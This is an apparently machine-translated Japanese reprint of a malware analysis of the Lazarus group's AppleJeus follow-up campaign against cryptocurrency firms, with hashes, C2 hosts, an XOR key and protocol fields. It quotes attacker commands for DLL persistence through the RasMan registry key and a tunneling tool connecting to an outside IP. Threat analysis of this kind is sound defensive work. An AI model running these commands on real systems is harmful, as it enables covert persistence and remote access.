AppleJeus アクション分析の実施方法

Lazarus 組織は、現在最も活発な APT 組織の 1 つです。 2018 年、カスペルスキーは、この組織が開始した AppleJeus と呼ばれる攻撃キャンペーンを発見しました。この操作は、Lazarus による macOS ユーザーに対する最初の攻撃です. macOS ユーザーを攻撃するために、Lazarus は macOS マルウェアを開発し、認証メカニズムを追加しました. 後段のペイロードを非常に慎重に、ディスクを落とすことなくダウンロードできます. 次の段階のペイロードをロードします. Windows ユーザーを攻撃するために、彼らは多段階の感染プロセスを開発しました。 「AppleJeus」の動作解析が公開されてから、Lazarusは攻撃を行う際により慎重になり、検出を回避する手法をより多く採用するようになりました。

AppleJeus フォローアップ

Operation AppleJeus の分析を公開した後、Lazarus は同様の手口を使用して暗号通貨ビジネスを妨害し続けており、研究者らは発見されたものと同様の macOS マルウェアをさらに発見しました。 AppleJeus のマルウェア。この macOS マルウェアは、公開コードを使用してインストーラーを開発します。このマルウェアは、Centrabit によって開発された QtBitcoinTrader を使用します。

3 つの macOS インストーラーは、同様のポストインストーラー スクリプトを使用してペイロードをドロップし、フェッチされた第 2 段階のペイロードを実行するときに同じコマンドを使用します。さらに、別のタイプの macOS マルウェア MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d) も確認されました。このマルウェアは 2019 年 3 月 12 日に作成されましたが、ネットワーク通信は暗号化されておらず、macOS マルウェアの変換の中間段階であると推測されています。そしてアップグレードします。

Windows マルウェアの変化

このキャンペーンの継続的な追跡により、被害者が 2019 年 3 月に Windows AppleJeus マルウェアによって攻撃されたことが判明しました。感染は WFCUpdater.exe という名前の悪意のあるファイルから始まり、攻撃者は偽の Web サイト wfcwallet[.]com を使用したことが判明しました。

#攻撃者は以前と同様に多段階感染を使用しましたが、その手法は変更されました。感染は、WFC ウォレット アップデータ (a9e960948fdac81579d3b752e49aceda) を装った .NET マルウェアから始まります。この .NET ファイルは、実行後にコマンド ライン パラメータが「/Embedding」であるかどうかを確認します。このマルウェアは、ハードコードされた 20 バイト XOR キー (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62) を使用して、同じフォルダーにある WFC.cfg ファイルを復号化します。次に、C2 サーバーに接続します:

wfcwallet.com (解決された IP: 108.174.195.134)

www.chainfun365.com(解決された IP: 23.254.217.53)

攻撃者のコマンドが実行され、次の段階のペイロードがインストールされます。攻撃者は、rasext.dll と msctfp.dat という 2 つのファイルを被害者のシステム フォルダに配置します。 RasMan (リモート アクセス接続マネージャー) Windows サービスを使用して、次の段階のペイロードを登録します。基本的な偵察の後、攻撃者は次のコマンドを使用してペイロードを手動で埋め込みました:

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc | findstr RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f

リモート トンネルを確立するために、攻撃者はコマンド ライン パラメータを使用してさらに関連ツールを埋め込みましたが、研究者はそれ以上のツール ファイルを入手できませんでした。

ポート オープナー:

%APPDATA%\Lenovo\devicecenter\Device.exe 6378

トンネリング ツール:

%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

macOS マルウェアの変更

JMTTrading

この攻撃の追跡 macOSマルウェアの亜種はキャンペーン中に発見されました。攻撃者は偽の Web サイトとアプリを JMTTrading と呼んでおり、他の研究者やセキュリティ ベンダーは広範な技術詳細を公開しています。この攻撃の何が違うのかを強調しましょう。

攻撃者は GitHub を使用して悪意のあるアプリケーションをホストします。

マルウェア作成者は、macOS マルウェアで QT フレームワークの代わりに Objective-C を使用しました。

このマルウェアは、macOS 実行可能ファイルに単純なバックドア機能を実装します。

前のケースと同様に、マルウェアは 16 バイトの XOR キーを使用して暗号化/復号化します。

Windows バージョンのマルウェアは、ADVobfuscator を使用してコードを隠します。

macOS マルウェアのインストール スクリプトは、以前のバージョンとは大きく異なります。

UnionCryptoTrader

macOS をターゲットとした別の攻撃も確認されています。この悪意のあるプログラムは UnionCryptoTrader と呼ばれ、セキュリティ研究者 dineshdina04 が同様のケースを発見しました。攻撃の概要は次のとおりです:

インストール スクリプトは JMTTrading が使用したものと同じです。

マルウェア作成者は、SWIFT を使用してこの macOS マルウェアを開発しました。

マルウェア作成者は情報収集方法を変更しました。

マルウェアは、第 2 段階のペイロードを配信するために、auth_signature パラメーターと auth_timestamp パラメーターを使用して認証を開始します。

マルウェアは、次の段階のペイロードをロードするためにディスクをドロップする必要はありません。

Windows バージョンの UnionCryptoTrader

研究者は、Windows バージョンの UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec) を発見しました。 Telegram Messenger からダウンロードされ、実行されます:

C:\Users\[ユーザー名]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe

これも偽の Web サイト上にあります攻撃者の Telegram が発見され、攻撃者が Telegram Messenger を使用してインストーラーを送信したことが強く確認されました。ペイロードはメモリ内でのみ実行されるため、関連するすべてのファイルをフェッチすることはできません。感染プロセス全体は WFCWallet と非常に似ていますが、注入プロセスが追加されています。

UnionCryptoTrader の Windows バージョンには、いくつかの暗号通貨の価格チャートを表示する次のウィンドウがあります。

UnionCryptoTrader アップデーター (629b9de3e4b84b4a0aa605a3e9471b31) の Windows バージョンには、macOS バージョンと同様の機能があります。ビルド パス (Z:\Loader\x64\Release\WinloaderExe.pdb) に基づいて、マルウェア作成者はこのマルウェアをローダーと呼びます。マルウェアは起動されると、被害者の基本情報を取得し、それを HTTP POST として送信します。

C2 サーバーからの応答が 200 の場合、マルウェアはペイロードを復号化し、メモリにロードします。最後に、マルウェアは act=done を送信します。このローダーからダウンロードされる次の段階のペイロード (e1953fa319cc11c2f003ad0542bca822) は、WFCWallet の .NET ダウンローダーに似ています。このマルウェアは、同じフォルダーにある Adob​​e.icx ファイルを復号化し、次のペイロードを Internet Explorer プロセスに挿入し、攻撃者のコマンドを実行します。

最終ペイロード (dd03c6eb62c9bf9adaf831f1d7adcbab) は WFCWallet と同じで、手動で植えられました。マルウェア作成者は、以前に収集した情報を使用して、特定のシステムでのみ動作するマルウェアを仕掛けます。マルウェアは、感染したシステムの情報をチェックし、指定された値と比較します。

Windows マルウェアは、暗号化された msctfp.dat ファイルをシステム フォルダーに読み込み、各構成を読み込みます。ファイルの内容に基づいて追加のコマンドを実行します。事前定義されたヘッダーを持つ POST リクエストは、マルウェアが C2 サーバーと通信するときに使用されます。

初期通信マルウェアは最初にパラメータを送信します:

cgu: 設定からの 64 ビット 16 進値

aip: ## の MD5 ハッシュの設定

#sv: ハードコードされた値

C2 サーバーからの応答が 200 の場合、マルウェアは暗号化されたデータとランダムな値を含む次の POST リクエストを攻撃者に送信します ランダムな値を使用して各被害者を識別しますそしてPOSTリクエストを検証します。

imp: ランダムに生成された値

dsh: imp の XOR 値

hb_tp: imp の XOR 値 (キー: 0x67BF32)

hb_dl : 送信される暗号化データC2 サーバー

ct : ハードコードされた値

最後に、マルウェアは次の段階のペイロードをダウンロードし、復号化します。

さらに、そのインフラストラクチャを調査中に、まだオンラインにあるいくつかの偽 Web サイトが発見されました。

概要

AppleJeusの追跡調査により、英国、ポーランド、ロシア、中国にいる複数の犠牲者が発見されました。被害者の中には仮想通貨ビジネスに関わっていた人もいた。

攻撃者は macOS と Windows マルウェアを改変し、macOS ダウンローダーに認証メカニズムを追加し、macOS 開発フレームワークを変更しました。 Windows システムの感染プロセスは以前のものとは異なります。 Lazarus グループは今後も金銭的利益を得るために攻撃を継続します。

以上がAppleJeus アクション分析の実施方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。